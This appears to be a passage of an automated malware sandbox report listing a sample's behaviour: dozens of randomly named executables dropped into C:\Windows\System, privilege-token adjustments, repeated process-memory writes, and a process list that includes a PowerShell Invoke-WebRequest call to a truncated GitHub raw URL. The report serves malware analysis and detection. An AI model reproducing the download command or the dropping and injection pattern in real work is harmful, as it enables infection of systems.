File created C:\Windows\System\vyxgYFe.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\vnwUJyw.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\JmMQFkt.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\osnTUts.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\OMUXXSw.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\zGuOQva.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\tWNjmyz.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\WGHSZgH.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\zyvxKDH.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\eydwQdn.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\YjDCmeF.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\YkGmLCq.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\xKKaMyz.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\JOYnNrg.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\UibzDSQ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\XaPgRPn.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\NtmMMHr.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\WxwuqHy.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\nqDcIUr.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\cyBnjpZ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\PsLnbvk.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\UDDLKrj.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\aTQHSHP.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\FRTDaOg.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\KdMhdcG.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\zTJPLmg.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\pDeGKlB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\Ifejsgh.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\ezvHMPZ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\cdegXHV.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\ildYHzM.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\WVAvvKH.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\XxxKZxE.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\AfoTyRA.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\EVtWtiT.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\vmYkMWD.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\ltNzCeE.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\MhrNknr.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\SSoHzsJ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\uFPaJzX.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\GdlicmX.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\pyklEzN.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\uRBnxVY.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\GXPQymL.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\sqWyKWb.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\FTLzxIZ.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\tzoJxRV.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\WNGhSHA.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\Hntgmjp.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\crChqOB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\XYznJLE.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\NYpCvhO.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\PFPkBge.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\yVbDAgV.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\YhhiQHw.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\udJcLmB.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\mxyYgcP.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\gPDXuwN.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
File created C:\Windows\System\GOJaRbd.exe C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\fIlbYNN.exe
PID 1920 wrote to memory of 3400 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\fIlbYNN.exe
PID 1920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\KNYYioD.exe
PID 1920 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\KNYYioD.exe
PID 1920 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\DKeohMX.exe
PID 1920 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\DKeohMX.exe
PID 1920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ejAqbSG.exe
PID 1920 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ejAqbSG.exe
PID 1920 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xebRqFN.exe
PID 1920 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xebRqFN.exe
PID 1920 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\qHgayBI.exe
PID 1920 wrote to memory of 4624 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\qHgayBI.exe
PID 1920 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ZRLQtiG.exe
PID 1920 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ZRLQtiG.exe
PID 1920 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ukGYJRY.exe
PID 1920 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ukGYJRY.exe
PID 1920 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\tKpaLNq.exe
PID 1920 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\tKpaLNq.exe
PID 1920 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ZTsJcPO.exe
PID 1920 wrote to memory of 4996 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ZTsJcPO.exe
PID 1920 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\NjtnXyN.exe
PID 1920 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\NjtnXyN.exe
PID 1920 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\nCueyzE.exe
PID 1920 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\nCueyzE.exe
PID 1920 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GbKxCZl.exe
PID 1920 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GbKxCZl.exe
PID 1920 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xVEBDBh.exe
PID 1920 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\xVEBDBh.exe
PID 1920 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\TrfYjmT.exe
PID 1920 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\TrfYjmT.exe
PID 1920 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\MWtlxai.exe
PID 1920 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\MWtlxai.exe
PID 1920 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\cScLAcj.exe
PID 1920 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\cScLAcj.exe
PID 1920 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\DmXYuHT.exe
PID 1920 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\DmXYuHT.exe
PID 1920 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\IEfnfGc.exe
PID 1920 wrote to memory of 512 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\IEfnfGc.exe
PID 1920 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\eJqpqPp.exe
PID 1920 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\eJqpqPp.exe
PID 1920 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\jSzHzpL.exe
PID 1920 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\jSzHzpL.exe
PID 1920 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ZuuCnwg.exe
PID 1920 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\ZuuCnwg.exe
PID 1920 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\fmipLjX.exe
PID 1920 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\fmipLjX.exe
PID 1920 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\Xkxrwyn.exe
PID 1920 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\Xkxrwyn.exe
PID 1920 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\XeCghno.exe
PID 1920 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\XeCghno.exe
PID 1920 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\FZoJRmx.exe
PID 1920 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\FZoJRmx.exe
PID 1920 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\CHZqqLH.exe
PID 1920 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\CHZqqLH.exe
PID 1920 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\HdcwxPK.exe
PID 1920 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\HdcwxPK.exe
PID 1920 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\PohxAXF.exe
PID 1920 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\PohxAXF.exe
PID 1920 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GlCpQHN.exe
PID 1920 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\GlCpQHN.exe
PID 1920 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\bPlYssB.exe
PID 1920 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe C:\Windows\System\bPlYssB.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6d5cf0b1c01bc2d3c4aa7b65bb39c810_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\fIlbYNN.exe

C:\Windows\System\fIlbYNN.exe

C:\Windows\System\KNYYioD.exe

C:\Windows\System\KNYYioD.exe

C:\Windows\System\DKeohMX.exe

C:\Windows\System\DKeohMX.exe

C:\Windows\System\ejAqbSG.exe

C:\Windows\System\ejAqbSG.exe

C:\Windows\System\xebRqFN.exe

C:\Windows\System\xebRqFN.exe

C:\Windows\System\qHgayBI.exe

C:\Windows\System\qHgayBI.exe

C:\Windows\System\ZRLQtiG.exe

C:\Windows\System\ZRLQtiG.exe

C:\Windows\System\ukGYJRY.exe

C:\Windows\System\ukGYJRY.exe

C:\Windows\System\tKpaLNq.exe

C:\Windows\System\tKpaLNq.exe

C:\Windows\System\ZTsJcPO.exe

C:\Windows\System\ZTsJcPO.exe

C:\Windows\System\NjtnXyN.exe

C:\Windows\System\NjtnXyN.exe

C:\Windows\System\nCueyzE.exe

C:\Windows\System\nCueyzE.exe

C:\Windows\System\GbKxCZl.exe

C:\Windows\System\GbKxCZl.exe

C:\Windows\System\xVEBDBh.exe

C:\Windows\System\xVEBDBh.exe

C:\Windows\System\TrfYjmT.exe

C:\Windows\System\TrfYjmT.exe

C:\Windows\System\MWtlxai.exe

C:\Windows\System\MWtlxai.exe

C:\Windows\System\cScLAcj.exe

C:\Windows\System\cScLAcj.exe

C:\Windows\System\DmXYuHT.exe

C:\Windows\System\DmXYuHT.exe

C:\Windows\System\IEfnfGc.exe

C:\Windows\System\IEfnfGc.exe

C:\Windows\System\eJqpqPp.exe

C:\Windows\System\eJqpqPp.exe

C:\Windows\System\jSzHzpL.exe

C:\Windows\System\jSzHzpL.exe

C:\Windows\System\ZuuCnwg.exe

C:\Windows\System\ZuuCnwg.exe

C:\Windows\System\fmipLjX.exe

C:\Windows\System\fmipLjX.exe

C:\Windows\System\Xkxrwyn.exe

C:\Windows\System\Xkxrwyn.exe

C:\Windows\System\XeCghno.exe

C:\Windows\System\XeCghno.exe

C:\Windows\System\FZoJRmx.exe

C:\Windows\System\FZoJRmx.exe

C:\Windows\System\CHZqqLH.exe

C:\Windows\System\CHZqqLH.exe

C:\Windows\System\HdcwxPK.exe

C:\Windows\System\HdcwxPK.exe

C:\Windows\System\PohxAXF.exe

C:\Windows\System\PohxAXF.exe

C:\Windows\System\GlCpQHN.exe

C:\Windows\System\GlCpQHN.exe

C:\Windows\System\bPlYssB.exe

C:\Windows\System\bPlYssB.exe

C:\Windows\System\ZYbpkOX.exe

C:\Windows\System\ZYbpkOX.exe

C:\Windows\System\gkPJXkj.exe

C:\Windows\System\gkPJXkj.exe

C:\Windows\System\xWcFORj.exe

C:\Windows\System\xWcFORj.exe

C:\Windows\System\lLFPZBq.exe

C:\Windows\System\lLFPZBq.exe

C:\Windows\System\clDEuyI.exe

C:\Windows\System\clDEuyI.exe

C:\Windows\System\hPPhOeu.exe

C:\Windows\System\hPPhOeu.exe

C:\Windows\System\CunewMt.exe

C:\Windows\System\CunewMt.exe

C:\Windows\System\FWOnZKp.exe

C:\Windows\System\FWOnZKp.exe

C:\Windows\System\HunkdpF.exe

C:\Windows\System\HunkdpF.exe

C:\Windows\System\ryDbGZf.exe

C:\Windows\System\ryDbGZf.exe

C:\Windows\System\RirffBw.exe

C:\Windows\System\RirffBw.exe

C:\Windows\System\JfrsSyE.exe

C:\Windows\System\JfrsSyE.exe

C:\Windows\System\LiGfXKF.exe

C:\Windows\System\LiGfXKF.exe

C:\Windows\System\yIDDIhB.exe

C:\Windows\System\yIDDIhB.exe

C:\Windows\System\lWtiRel.exe

C:\Windows\System\lWtiRel.exe

C:\Windows\System\aMudOFA.exe

C:\Windows\System\aMudOFA.exe

C:\Windows\System\UIhjBNl.exe

C:\Windows\System\UIhjBNl.exe

C:\Windows\System\bObWExB.exe

C:\Windows\System\bObWExB.exe

C:\Windows\System\YagVEZh.exe

C:\Windows\System\YagVEZh.exe

C:\Windows\System\SxlFphS.exe

C:\Windows\System\SxlFphS.exe

C:\Windows\System\fMaMkDV.exe

C:\Windows\System\fMaMkDV.exe

C:\Windows\System\fjPtlBi.exe

C:\Windows\System\fjPtlBi.exe

C:\Windows\System\zZxjCBu.exe

C:\Windows\System\zZxjCBu.exe

C:\Windows\System\aGBgxUE.exe

C:\Windows\System\aGBgxUE.exe

C:\Windows\System\qQrkxfO.exe

C:\Windows\System\qQrkxfO.exe

C:\Windows\System\LSRbJWJ.exe

C:\Windows\System\LSRbJWJ.exe

C:\Windows\System\CKnRotH.exe

C:\Windows\System\CKnRotH.exe

C:\Windows\System\DerJYsU.exe

C:\Windows\System\DerJYsU.exe

C:\Windows\System\wqrCysS.exe

C:\Windows\System\wqrCysS.exe

C:\Windows\System\ULDgfoU.exe

C:\Windows\System\ULDgfoU.exe

C:\Windows\System\KQrVQtf.exe

C:\Windows\System\KQrVQtf.exe

C:\Windows\System\lMYZtyf.exe

C:\Windows\System\lMYZtyf.exe

C:\Windows\System\aObdxsX.exe

C:\Windows\System\aObdxsX.exe

C:\Windows\System\zZSNXYX.exe

C:\Windows\System\zZSNXYX.exe

C:\Windows\System\pBXIeBc.exe

C:\Windows\System\pBXIeBc.exe

C:\Windows\System\BiwRMFr.exe

C:\Windows\System\BiwRMFr.exe

C:\Windows\System\wcjkqrC.exe

C:\Windows\System\wcjkqrC.exe

C:\Windows\System\MkezNpY.exe

C:\Windows\System\MkezNpY.exe

C:\Windows\System\kGLdCPZ.exe

C:\Windows\System\kGLdCPZ.exe

C:\Windows\System\ywwsRfr.exe

C:\Windows\System\ywwsRfr.exe

C:\Windows\System\vfNwauW.exe

C:\Windows\System\vfNwauW.exe

C:\Windows\System\ZNNcEUw.exe

C:\Windows\System\ZNNcEUw.exe

C:\Windows\System\vTDNufA.exe

C:\Windows\System\vTDNufA.exe

C:\Windows\System\RxQXrDp.exe

C:\Windows\System\RxQXrDp.exe

C:\Windows\System\BTiGPKT.exe

C:\Windows\System\BTiGPKT.exe

